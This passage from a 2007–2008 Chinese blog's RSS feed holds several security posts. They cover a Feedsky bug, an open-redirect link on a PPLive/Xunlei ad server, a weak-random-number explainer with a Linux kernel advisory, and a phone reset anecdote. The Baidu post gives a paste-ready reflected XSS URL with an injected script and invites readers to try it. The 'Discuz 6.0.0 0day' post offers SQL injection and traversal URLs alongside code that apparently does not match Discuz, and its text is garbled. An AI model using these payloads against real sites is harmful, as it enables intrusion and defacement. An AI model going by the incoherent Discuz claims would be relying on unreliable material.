<hr /><h2>Comments</h2><ul><li><a href="http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/#comment-84">February  21, 2008</a>, <a href='http://glif.cn' rel='external nofollow' class='url'>Src</a> writes: 其实这个不算bug了，呵呵</li><li><a href="http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/#comment-86">February  22, 2008</a>, wiki writes: Src:发现后就通知官方客服啦!现在确实修复好啦</li></ul><hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/about/check-feedsky-1382/" rel="bookmark" title="Permanent Link: 验证FeedSky">验证FeedSky</a></li><li><a href="http://clin003.com/suggested-contents/practical-jokes-others-daquan-598/" rel="bookmark" title="Permanent Link: ★经典★恶搞他人大全■搞跨·#愚人节■">★经典★恶搞他人大全■搞跨·#愚人节■</a></li><li><a href="http://clin003.com/search-engine/search-engine-ping-services-address-260/" rel="bookmark" title="Permanent Link: 搜索引擎的ping服务地址">搜索引擎的ping服务地址</a></li><li><a href="http://clin003.com/internet/small-enough-and-smart-enough-linux-damn-small-linux-v423-final-342/" rel="bookmark" title="Permanent Link: small enough and smart enough linux(Damn Small Linux v4.2.3 Final )">small enough and smart enough linux(Damn Small Linux v4.2.3 Final )</a></li><li><a href="http://clin003.com/baidu/baidu-2008-hope-261/" rel="bookmark" title="Permanent Link: 百度的新年愿景">百度的新年愿景</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/" >http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/</a> <br /> <a href="http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/practical-jokes-feedsky-binding-domain-feedsky-a-small-bug-395/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>很显然pplive的广告业务中有跨站漏洞（迅雷：cknum.xunlei.com）</title>
		<link>http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/</link>
		<comments>http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/#comments</comments>
		<pubDate>Fri, 04 Jan 2008 01:17:33 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[互联网]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[pplive]]></category>
		<category><![CDATA[广告]]></category>
		<category><![CDATA[跨站漏洞]]></category>
		<category><![CDATA[迅雷]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/pplive-ad-host-cknum-xunlei-com-298.shtml</guid>
		<description><![CDATA[http://cknum.xunlei.com/fcg-bin/cgi_banner_stat.fcg?url=http://wz.mygogou.com/直接打开这个链接就会转到本博客。 这个（cknum.xunlei.com）是pplive的一个广告服务器(频道)。 还不清楚pplive和迅雷是不是只是广告上的合作。 pplive的广告服务器地址有： cknum.xunlei.com cop.my.xunlei.com biz5.sandai.net pt.cga.com.cn pp.pplive.com Related posts:Firefox代理使用办法某局对谷歌音乐下手啦？今日杂碎：邮件原来是迅雷惹的祸今日杂碎：域名纠错——>域名劫持Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p><a href="http://cknum.xunlei.com/fcg-bin/cgi_banner_stat.fcg?url=http://wz.mygogou.com/">http://cknum.xunlei.com/fcg-bin/cgi_banner_stat.fcg?url=http://wz.mygogou.com/</a>直接打开这个链接就会转到本博客。</p>
<p>这个（cknum.xunlei.com）是pplive的一个广告服务器(频道)。</p>
<p>还不清楚pplive和迅雷是不是只是广告上的合作。</p>
<p>pplive的广告服务器地址有：</p>
<p>cknum.xunlei.com</p>
<p>cop.my.xunlei.com<br />
biz5.sandai.net<br />
pt.cga.com.cn<br />
pp.pplive.com</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/internet/firefox-using-proxy-433/" rel="bookmark" title="Permanent Link: Firefox代理使用办法">Firefox代理使用办法</a></li><li><a href="http://clin003.com/ideas/ping-google-music-by-g-top100-cn-1442/" rel="bookmark" title="Permanent Link: 某局对谷歌音乐下手啦？">某局对谷歌音乐下手啦？</a></li><li><a href="http://clin003.com/ideas/send-email-1557/" rel="bookmark" title="Permanent Link: 今日杂碎：邮件">今日杂碎：邮件</a></li><li><a href="http://clin003.com/internet/xunlei-config-373/" rel="bookmark" title="Permanent Link: 原来是迅雷惹的祸">原来是迅雷惹的祸</a></li><li><a href="http://clin003.com/ideas/cncmax-domain-name-hijacking-1547/" rel="bookmark" title="Permanent Link: 今日杂碎：域名纠错——>域名劫持">今日杂碎：域名纠错——>域名劫持</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/" >http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/</a> <br /> <a href="http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/pplive-ad-host-cknum-xunlei-com-298/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>E2手机病毒?</title>
		<link>http://clin003.com/exploits/e2-phone-menu-215/</link>
		<comments>http://clin003.com/exploits/e2-phone-menu-215/#comments</comments>
		<pubDate>Sun, 16 Dec 2007 08:45:43 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[推荐,内容]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[E2]]></category>
		<category><![CDATA[复位]]></category>
		<category><![CDATA[安全密码]]></category>
		<category><![CDATA[手机病毒]]></category>
		<category><![CDATA[菜单]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/e2-phone-menu-215.shtml</guid>
		<description><![CDATA[漫不经心的打开主菜单，天!竞只剩固定拨号，神州行，，几个图标!我的第一感觉就是中病毒啦?不太可能吧!一个小小的e2?难到是昨晚电用完时的非法关机。试着关机开机几遍都没作用。奇怪啦，快捷键都能用(可以重新设置，只能看见应用程序，看不见系统设置类的菜单!)，就是从主菜单没法找到!，最后终于在侧面语音功能中找到&#8221;复位&#8221;菜单，只有删除全部的复位功能把主菜单找回来啦，感谢ing，不过代价是短信，通信录等手机上存的资料统统丢失，内存卡上的软件要重新下过用设置依然。明白啦e2安全密码是在手机复位时用到和锁定密码不同! Related posts:Testing phone post看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马Gmail要求手机验证怎么办 (国家列表中没有China)手机嗅探扫描，窃&#8230;Fedora 11 下硬盘安装(升级)到 Fedora 12Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/e2-phone-menu-215/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>漫不经心的打开主菜单，天!竞只剩固定拨号，神州行，，几个图标!我的第一感觉就是中病毒啦?不太可能吧!一个小小的e2?难到是昨晚电用完时的非法关机。试着关机开机几遍都没作用。奇怪啦，快捷键都能用(可以重新设置，只能看见应用程序，看不见系统设置类的菜单!)，就是从主菜单没法找到!，最后终于在侧面语音功能中找到&#8221;复位&#8221;菜单，只有删除全部的复位功能把主菜单找回来啦，感谢ing，不过代价是短信，通信录等手机上存的资料统统丢失，内存卡上的软件要重新下过用设置依然。<br />明白啦e2安全密码是在手机复位时用到和锁定密码不同!</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/about/testing-phone-post-183/" rel="bookmark" title="Permanent Link: Testing phone post">Testing phone post</a></li><li><a href="http://clin003.com/technical-analysis/zhang-yi-limitations-of-using-a-mobile-phone-to-set-aside-pc-trojan-defense-authorization-546/" rel="bookmark" title="Permanent Link: 看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马">看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马</a></li><li><a href="http://clin003.com/ideas/gmail-receive-a-text-message-with-a-password-reset-code-on-your-mobile-phone-2057/" rel="bookmark" title="Permanent Link: Gmail要求手机验证怎么办 (国家列表中没有China)">Gmail要求手机验证怎么办 (国家列表中没有China)</a></li><li><a href="http://clin003.com/safe/phone-sniffer-484/" rel="bookmark" title="Permanent Link: 手机嗅探扫描，窃&#8230;">手机嗅探扫描，窃&#8230;</a></li><li><a href="http://clin003.com/linux/fedora-11-to-fedora-12-upgrading-your-system-1846/" rel="bookmark" title="Permanent Link: Fedora 11 下硬盘安装(升级)到 Fedora 12">Fedora 11 下硬盘安装(升级)到 Fedora 12</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/e2-phone-menu-215/" >http://clin003.com/exploits/e2-phone-menu-215/</a> <br /> <a href="http://clin003.com/exploits/e2-phone-menu-215/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/e2-phone-menu-215/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>什么是随机数漏洞,什么是脆弱的随机数</title>
		<link>http://clin003.com/exploits/what-is-a-random-number-vulnerability-203/</link>
		<comments>http://clin003.com/exploits/what-is-a-random-number-vulnerability-203/#comments</comments>
		<pubDate>Wed, 28 Nov 2007 08:23:36 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[技术分析]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[脆弱的随机数]]></category>
		<category><![CDATA[随机数漏洞]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/what-is-a-random-number-vulnerability-203.shtml</guid>
		<description><![CDATA[电脑在没有用户参与的情况不能产生真正的随机数。 脆弱的随机数（随机数漏洞）只有在程序使用普通的方式产生随机数出现，主要有以下两种情况产生： 1，本来就不是随机数 2，这个产生的随机数是可以预测的，或可以通过某种途径预测到的 如果创造良好的随机数，电脑必须有达到两个条件： 1，一个良好的随机数生成算法 2，随机数生成算法有一个随机的和不可预测随机数种子 脆弱性随机数的例子 代码片断： srand (time (0)); x=rand(); 这个代码产生脆弱的随机号码，它使用的值为1作为默认种子。 其他任何人在相同的机器上用同样编译这段代码，将得到同样的随机数 随机数漏洞： 随机数生成器本地栈溢出 受影响系统： Linux kernel &#60; 2.6.22 不受影响系统： Linux kernel 2.6.22 描述： Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux kernel的随机数生成器（RNG）实现中存在栈溢出漏洞，本地攻击者可能利用此漏洞提升自己的权限。 如果本地root用户将默认的wakeup阀值设置为比输出池大小还要大的值的话，池传输函数就可能用RNG字节写入栈，触发栈溢出，导致拒绝服务或权限提升。 厂商补丁： Linux 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.22.3.tar.bz2 参考以下英文片段 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; What is &#8230; <a href="http://clin003.com/exploits/what-is-a-random-number-vulnerability-203/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>电脑在没有用户参与的情况不能产生真正的随机数。</p>
<p>脆弱的随机数（随机数漏洞）只有在程序使用普通的方式产生随机数出现，主要有以下两种情况产生：<br />
1，本来就不是随机数<br />
2，这个产生的随机数是可以预测的，或可以通过某种途径预测到的</p>
<p>如果创造良好的随机数，电脑必须有达到两个条件：<br />
1，一个良好的随机数生成算法<br />
2，随机数生成算法有一个随机的和不可预测随机数种子</p>
<p>脆弱性随机数的例子<span id="more-203"></span></p>
<p>代码片断：</p>
<pre>srand (time (0));
x=rand();</pre>
<p>这个代码产生脆弱的随机号码，它使用的值为1作为默认种子。<br />
其他任何人在相同的机器上用同样编译这段代码，将得到同样的随机数</p>
<p>随机数漏洞：<br />
随机数生成器本地栈溢出</p>
<p>受影响系统：<br />
Linux kernel &lt; 2.6.22</p>
<p>不受影响系统：<br />
Linux kernel 2.6.22</p>
<p>描述：<br />
Linux Kernel是开放源码操作系统Linux所使用的内核。</p>
<p>Linux kernel的随机数生成器（RNG）实现中存在栈溢出漏洞，本地攻击者可能利用此漏洞提升自己的权限。</p>
<p>如果本地root用户将默认的wakeup阀值设置为比输出池大小还要大的值的话，池传输函数就可能用RNG字节写入栈，触发栈溢出，导致拒绝服务或权限提升。</p>
<p>厂商补丁：<br />
Linux<br />
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：</p>
<p>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.22.3.tar.bz2</p>
<p>参考以下英文片段<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<h1>What is a random number vulnerability?</h1>
<p>Computers are deterministic and are therefore predictable.  Computers cannot, in and of themselves, generate truly random numbers.</p>
<p>In the absense of outside input, computers can only create pseudo-random numbers.</p>
<p>A random number vulnerability occurs when a program uses a method of generating random numbers which is either:</p>
<ol>
<li>Not random</li>
<li>Predictable</li>
</ol>
<p>To generate good random numbers, the computer must have two things:</p>
<ol>
<li>A good random number generation algorithm</li>
<li>A random and unpredicatable seed for the random number generation algorithm</li>
</ol>
<h2>Random Number Vulnerability Examples</h2>
<p>Consider the following code snippet:</p>
<blockquote>
<pre>x=rand();</pre>
</blockquote>
<p>This code generated bad random numbers because when you call rand() before a seed has been established with srand(), it uses the value 1 as a default seed. Anyone else on the same machine with the same compiler who calls rand() with a seed of 1 will get the same random number as you just did.</p>
<p>Let&#8217;s look at another code snippet:</p>
<blockquote>
<pre>srand (time (0));
x=rand();</pre>
</blockquote>
<p>This code does call srand() with the current time as a seed.  However, this code is still insecure because:</p>
<ol>
<li>The system time is a very bad seed, because it is predictable within a small range.</li>
<li>The ANSI C rand() function itself does not generate good random numbers.</li>
</ol>
<p>Let&#8217;s examine a third code snippet:</p>
<blockquote>
<pre>srandom (time (0));
x=random();</pre>
</blockquote>
<p>This code uses the BSD random() and srandom() functions, which generate much better random numbers than their ANSI C predecessors. However, this code still uses time() to generate the seed number. A much better source for random numbers on BSD and Linux systems is the /dev/random device.</p>
<h2>Number Seeds and Random Number Vulnerabilities</h2>
<p>Good seed numbers come from unpredictable events such as user keystrokes or mouse movements. These are not perfect sources of randomness, however. Human behavior is somewhat predictable and computer hardware can buffer keyboard and mouse interrupts, reducing their randomness.</p>
<p>Numerous other random number generators are available for various platforms and development environments. It is extremely difficult to create a good one, and even more difficult to determine if the random number generator you created really is generating random and unpredictable numbers. The best path for most applications is to implement an existing random number generator which has been subject to public cryptanalysis.</p>
<p>Random number vulnerabilities are of interest to hackers when they can be utilized to determine input values to <a href="http://www.tech-faq.com/cryptology-cryptography-cryptanalysis.shtml">cryptographic</a> functions. This can be utilized in cryptanalysis.</p>
<p>Improper use of the function calls rand() and random() are the normal causes of random number vulnerabilities.</p>
<h2>Additional Information Sources on Generating Random Numbers</h2>
<p>For more information on generating random numbers, read <a href="http://www.faqs.org/rfcs/rfc1750.html" rel="nofollow" target="_blank">RFC 1750 &#8211; Randomness Recommendations for Security</a>.</p>
<p><a href="http://wiki.mygogou.com/doc-view-771.html">百科地址：http://wiki.mygogou.com/doc-view-771.html</a></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/pligg-use/pligg-rss-2-93/" rel="bookmark" title="Permanent Link: Pligg安装啦啦rss导入模块（Rss Importer插件的使用）">Pligg安装啦啦rss导入模块（Rss Importer插件的使用）</a></li><li><a href="http://clin003.com/ideas/discuz-plugin-exploits-1800/" rel="bookmark" title="Permanent Link: 使用Discuz插件的同学需要注意了">使用Discuz插件的同学需要注意了</a></li><li><a href="http://clin003.com/search-engine/sousuohuaerzi-renrousousuo-1730/" rel="bookmark" title="Permanent Link: 搜索华尔兹,人肉搜索的又一利器？">搜索华尔兹,人肉搜索的又一利器？</a></li><li><a href="http://clin003.com/ideas/am-honoured-some-people-even-to-detect-this-blog-1235/" rel="bookmark" title="Permanent Link: 很荣幸！竟然有人来检测这个Blog啦">很荣幸！竟然有人来检测这个Blog啦</a></li><li><a href="http://clin003.com/wp-use/upgrading-wordpress-263-1550/" rel="bookmark" title="Permanent Link: 紧急更新至WordPress 2.6.3">紧急更新至WordPress 2.6.3</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/what-is-a-random-number-vulnerability-203/" >http://clin003.com/exploits/what-is-a-random-number-vulnerability-203/</a> <br /> <a href="http://clin003.com/exploits/what-is-a-random-number-vulnerability-203/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/what-is-a-random-number-vulnerability-203/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Discuz 6.0.0 0Day漏洞</title>
		<link>http://clin003.com/exploits/discuz-600-0day-2-198/</link>
		<comments>http://clin003.com/exploits/discuz-600-0day-2-198/#comments</comments>
		<pubDate>Sat, 24 Nov 2007 08:54:57 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[技术分析]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/discuz-600-0day-2-198.shtml</guid>
		<description><![CDATA[Discuz 6.0.0允许程序在 register_globals = off 的环境下工作 以下是代码片段：$onoff = (function_exists(&#8216;ini_get&#8217;)) ? ini_get(&#8216;register_globals&#8217;) : get_cfg_var(&#8216;register_globals&#8217;); if ($onoff != 1) { @extract($_POST, EXTR_SKIP); @extract($_GET, EXTR_SKIP); } $self = $_SERVER['PHP_SELF']; $dis_func = get_cfg_var(&#8220;disable_functions&#8221;); /*===================== 身份验证 =====================*/ if($admin['check'] == &#8220;1&#8243;) { if ($_GET['action'] == &#8220;logout&#8221;) &#8230; <a href="http://clin003.com/exploits/discuz-600-0day-2-198/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Discuz 6.0.0允许程序在 register_globals = off 的环境下工作<span id="more-198"></span></p>
<table style="border: 1px dotted #cccccc; table-layout: fixed; width: 390px; height: 838px" align="center" border="0" cellpadding="6" cellspacing="0" width="390">
<tr>
<td bgcolor="#fdfddf">以下是代码片段：$onoff = (function_exists(&#8216;ini_get&#8217;)) ? ini_get(&#8216;register_globals&#8217;) : get_cfg_var(&#8216;register_globals&#8217;);</p>
<p>if ($onoff != 1) {<br />
@extract($_POST, EXTR_SKIP);<br />
@extract($_GET, EXTR_SKIP);<br />
}</p>
<p>$self = $_SERVER['PHP_SELF'];<br />
$dis_func = get_cfg_var(&#8220;disable_functions&#8221;);</p>
<p>/*===================== 身份验证 =====================*/<br />
if($admin['check'] == &#8220;1&#8243;) {<br />
if ($_GET['action'] == &#8220;logout&#8221;) {<br />
setcookie (&#8220;adminpass&#8221;, &#8220;&#8221;);<br />
echo &#8220;&#8221;;<br />
echo &#8220;注销成功&#8230;&#8230;三秒后自动退出或单击这里退出程序界面 &gt;&gt;&gt;</p>
<p>&#8220;;<br />
exit;<br />
}</p>
<p>if ($_POST['do'] == &#8216;login&#8217;) {<br />
$thepass=trim($_POST['adminpass']);<br />
if ($admin['pass'] == $thepass) {<br />
setcookie (&#8220;adminpass&#8221;,$thepass,time()+(1*24*3600));<br />
echo &#8220;&#8221;;<br />
echo &#8220;登陆成功&#8230;&#8230;三秒后自动跳转或单击这里进入程序界面 &gt;&gt;&gt;</p>
<p>&#8220;;<br />
exit;<br />
}<br />
}<br />
if (isset($_COOKIE['adminpass'])) {<br />
if ($_COOKIE['adminpass'] != $admin['pass']) {<br />
loginpage();<br />
}<br />
} else {<br />
loginpage();<br />
}<br />
}<br />
/*===================== 验证结束 =====================*/</p>
<p>// 判断 magic_quotes_gpc 状态<br />
if (get_magic_quotes_gpc()) {<br />
$_GET = stripslashes_array($_GET);<br />
$_POST = stripslashes_array($_POST);<br />
}</td>
</tr>
</table>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>http://www.discuz.net/admin/logging.php?action=login</p>
<p>可以跳到其它目录<br />
注册登录后利用</p>
<p>http://www.discuz.net/search.php?user%id=100</p>
<p>可以进行injection……</p>
<p>只能手工注射</p>
<p>注意:showpath里必须包含用户自己的路径<br />
如果限制的话，还可以向上跳,向上级传文件的时候，不能直接<br />
http://www. http://www.discuz.net/user/up/_id=../../&#8230;&#8230;/(注射语句)<br />
就包含用户路径</p>
<p>http://www.discuz.net/member.php?action=list_UserNumber=1402257EE8F</p>
<p>不然不能进行注射。</p>
<p>文件漏洞代码如下</p>
<table style="border: 1px dotted #cccccc; table-layout: fixed; width: 496px; height: 426px" align="center" border="0" cellpadding="6" cellspacing="0" width="496">
<tr>
<td bgcolor="#fdfddf">以下是代码片段：define(&#8216;__SYSTEM_ROOT&#8217;, &#8221;);<br />
include dirname(__FILE__).&#8217;/framework_gb/framework.php&#8217;;</p>
<p>using(&#8216;System.Data.Data&#8217;);<br />
using(&#8216;System.Data.Plugins.Option&#8217;);<br />
using(&#8216;System.Page.Page&#8217;);<br />
using(&#8216;System.Smarty.Smarty&#8217;);<br />
using(&#8216;System.Functions.Functions&#8217;);</p>
<p>require_once __SYSTEM_ROOT.&#8221;global.php&#8221;;<br />
require_once __SYSTEM_ROOT.&#8221;vars.php&#8221;;</p>
<p>$db=new stdClass();</p>
<p>$db=$Data-&gt;getDB();<br />
/*</p>
<p>echo &#8216;</p>
<pre>';print_r($Data);

*/

?&gt;</pre>
</td>
</tr>
</table>
<p>可以直接<a href="http://wiki.mygogou.com/doc.php?action=view&amp;title=%E6%B3%A8%E5%B0%84">注射</a>,拿到后台密码。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/safe/discuz-wap-20081117-1584/" rel="bookmark" title="Permanent Link: 紧急对比更新Discuz论坛安全补丁包[20081117]">紧急对比更新Discuz论坛安全补丁包[20081117]</a></li><li><a href="http://clin003.com/ideas/discuz-plugin-exploits-1800/" rel="bookmark" title="Permanent Link: 使用Discuz插件的同学需要注意了">使用Discuz插件的同学需要注意了</a></li><li><a href="http://clin003.com/debug/discuz-x1-neibucuowu-wufaxianshicineirong-2029/" rel="bookmark" title="Permanent Link: Discuz! X1: &#8220;内部错误，无法显示此内容&#8221; 的纠结问题【附参考解决办法】">Discuz! X1: &#8220;内部错误，无法显示此内容&#8221; 的纠结问题【附参考解决办法】</a></li><li><a href="http://clin003.com/web2o-webos/discuz-guoqignmobanyetouguanggaocuoweijiejuebanfa-1811/" rel="bookmark" title="Permanent Link: 完美解决Discuz官方国庆模板页头广告错位方法">完美解决Discuz官方国庆模板页头广告错位方法</a></li><li><a href="http://clin003.com/safe/discuz72-uchome20-20100110-1880/" rel="bookmark" title="Permanent Link: Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)">Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/discuz-600-0day-2-198/" >http://clin003.com/exploits/discuz-600-0day-2-198/</a> <br /> <a href="http://clin003.com/exploits/discuz-600-0day-2-198/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/discuz-600-0day-2-198/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>百度跨站漏洞：当前日期(date): 2007-11-24 星期六</title>
		<link>http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/</link>
		<comments>http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/#comments</comments>
		<pubDate>Sat, 24 Nov 2007 08:45:28 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[推荐,内容]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/baidu-inter-station-loopholes-2007-11-24-196.shtml</guid>
		<description><![CDATA[百度跨站漏洞，小漏洞，大危害！ 影响版本： 当前日期(date): 2007-11-24 星期六 此漏洞属于跨站漏洞，希望大家不要利用此漏洞去挂马！ 直接复制下面的地址到IE浏览器中去看效果吧：(实验时自行去掉中间的空格) http://www.baidu.com/index.php?tn=&#8221;&#62;http://www.baidu.com/index.php?tn=&#8221;&#62;&#60; script&#62;alert(/wiki.mygogou.com/)&#60; /script&#62; 把这段代码中间的网址修改成我们的首页地址： http://www.baidu.com/index.php?tn=&#8221;&#62;http://wiki.mygogou.com=&#8221;&#62;&#60; script&#62;alert(/wiki.mygogou.com/)&#60; /script&#62; wiki地址：http://wiki.mygogou.com/doc-view-744.html  Related posts:腾讯体验中心跨站漏洞及利用想法百度搜索联盟广告跨站漏洞百度准备自杀啦？去除Office onenote 2007的激活验证和试用版标记百度的新年愿景Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>百度跨站漏洞，小漏洞，大危害！<br />
影响版本：<br />
当前日期(date): 2007-11-24 星期六<br />
此漏洞属于<a href="http://wiki.mygogou.com/doc.php?action=view&amp;title=%E8%B7%A8%E7%AB%99%E6%BC%8F%E6%B4%9E" class="innerlink">跨站漏洞</a>，希望大家不要利用此漏洞去挂马！</p>
<p>直接复制下面的地址到IE浏览器中去看效果吧：(实验时自行去掉中间的空格)<br />
http://www.baidu.com/index.php?tn=&#8221;&gt;http://www.baidu.com/index.php?tn=&#8221;&gt;&lt; script&gt;alert(/wiki.mygogou.com/)&lt; /script&gt;</p>
<p>把这段代码中间的网址修改成我们的首页地址：<br />
http://www.baidu.com/index.php?tn=&#8221;&gt;http://wiki.mygogou.com=&#8221;&gt;&lt; script&gt;alert(/wiki.mygogou.com/)&lt; /script&gt;</p>
<p><a href="http://wiki.mygogou.com/doc-view-744.html">wiki地址：http://wiki.mygogou.com/doc-view-744.html </a></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/" rel="bookmark" title="Permanent Link: 腾讯体验中心跨站漏洞及利用想法">腾讯体验中心跨站漏洞及利用想法</a></li><li><a href="http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/" rel="bookmark" title="Permanent Link: 百度搜索联盟广告跨站漏洞">百度搜索联盟广告跨站漏洞</a></li><li><a href="http://clin003.com/ideas/baidu-ready-to-commit-suicide-1485/" rel="bookmark" title="Permanent Link: 百度准备自杀啦？">百度准备自杀啦？</a></li><li><a href="http://clin003.com/suggested-contents/office-onenote-2007-miyue-quchujihuoyanzheng-1963/" rel="bookmark" title="Permanent Link: 去除Office onenote 2007的激活验证和试用版标记">去除Office onenote 2007的激活验证和试用版标记</a></li><li><a href="http://clin003.com/baidu/baidu-2008-hope-261/" rel="bookmark" title="Permanent Link: 百度的新年愿景">百度的新年愿景</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/" >http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/</a> <br /> <a href="http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>网际快车（FlashGet）0day漏洞</title>
		<link>http://clin003.com/exploits/flashget-0day-50/</link>
		<comments>http://clin003.com/exploits/flashget-0day-50/#comments</comments>
		<pubDate>Mon, 22 Oct 2007 04:50:34 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/flashget-0day/</guid>
